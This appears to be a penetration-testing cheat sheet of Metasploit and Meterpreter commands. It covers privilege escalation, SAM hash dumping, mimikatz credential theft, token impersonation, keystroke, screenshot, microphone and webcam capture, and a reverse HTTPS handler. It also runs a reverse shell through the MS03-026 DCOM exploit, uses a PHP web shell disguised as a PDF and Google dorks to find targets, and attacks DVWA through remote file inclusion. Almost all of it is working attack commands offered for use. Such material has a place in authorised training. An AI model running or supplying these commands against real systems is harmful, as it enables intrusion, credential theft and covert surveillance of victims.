[+] Meterpreter Shell
meterpreter > sysinfo
meterpreter > getuid
meterpreter > getsystem
meterpreter > hashdump
meterpreter > load/use mimikatz
kerberos Attempt to retrieve kerberos creds livessp Attempt to retrieve livessp creds mimikatz_command Run a custom commannd msv Attempt to retrieve msv creds (hashes) ssp Attempt to retrieve ssp creds tspkg Attempt to retrieve tspkg creds wdigest Attempt to retrieve wdigest creds
meterpreter > wdigest
meterpreter > use incognito meterpreter > list_tokens -u meterpreter > impersonate_token SERV-2K3\Administrator execute -f cmd.exe -i -t
Metasploit Exploit Multi Handler
multi/handler to accept an incoming reverse_https_meterpreter
`payload
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST $ip
set LPORT 443
exploit
[*] Started HTTPS reverse handler on https://$ip:443/`
Building Your Own MSF Module
`mkdir -p ~/.msf4/modules/exploits/linux/misc
cd ~/.msf4/modules/exploits/linux/misc
cp
/usr/share/metasploitframework/modules/exploits/linux/misc/gld\_postfix.rb
./crossfire.rb
nano crossfire.rb`
Post Exploitation with Metasploit - (available options depend on OS and Meterpreter Cababilities)
`download` Download a file or directory
`upload` Upload a file or directory
`portfwd` Forward a local port to a remote service
`route` View and modify the routing table
`keyscan_start` Start capturing keystrokes
`keyscan_stop` Stop capturing keystrokes
`screenshot` Grab a screenshot of the interactive desktop
`record_mic` Record audio from the default microphone for X seconds
`webcam_snap` Take a snapshot from the specified webcam
`getsystem` Attempt to elevate your privilege to that of local system.
`hashdump` Dumps the contents of the SAM database
search dcom
msf > search dcom
msf > use exploit/windows/dcerpc/ms03_026_dcom
msf > set RHOST 10.0.0.3
msf > show payloads
msf > set PAYLOAD generic/shell_reverse_tcp
msf > set LHOST 10.0.0.6
msf > exploit
sessions –i 1
C: >dir
wc lfi.pdf
4 4 42 lfi.pdf
cat lfi.pdf
%PDF-1.4
<?php
system($_GET["cmd"]);
?>
msfnginx
sitemap.xml filetype:xml intext:"cgi-bin" filetype:sh inurl:cgi-bin filetype:sh intext:cgi-bin intitle:apache "cgi-bin" inurl:cgi-bin inurl:wspd_cgi.sh inurl:wslb.sh inurl:"server-status" intitle:apache "cgi-bin" inurl:cgi-bin "GATEWAY_INTERFACE = CGI" inurl:cgi-bin inurl:printenv intext:SERVER_ADDR
http://172.16.1.102/dvwa/vulnerabilities/fi/?page=http://172.16.1.100/test.php
exploit/linux/http/nginx_chunked_size
auxiliary/scanner/http/wordpress_ghost_scanner
sudo nano /etc/php5/cgi/php.ini
allow_url_fopen and allow_url_include are both set to On. Press Ctrl-X, Y, and Enter
sudo /etc/init.d/apache2 restart
nano /var/www/html/test.php
service apache2 restart
msf exploit(unix/webapp/php_include) > set rhost 172.16.1.102
msf exploit(unix/webapp/php_include) > set headers "Cookie:security=low; PHPSESSID=4c0c7c70dfafab05e7d04c88c8966aee"
headers => Cookie:security=low; PHPSESSID=4c0c7c70dfafab05e7d04c88c8966aee
msf exploit(unix/webapp/php_include) > set path /dvwa/vulnerabilities/fi/
msf exploit(unix/webapp/php_include) > set phpuri /?page=XXpathXX
msf exploit(unix/webapp/php_include) > set payload php/bind_php
msf exploit(unix/webapp/php_include) > run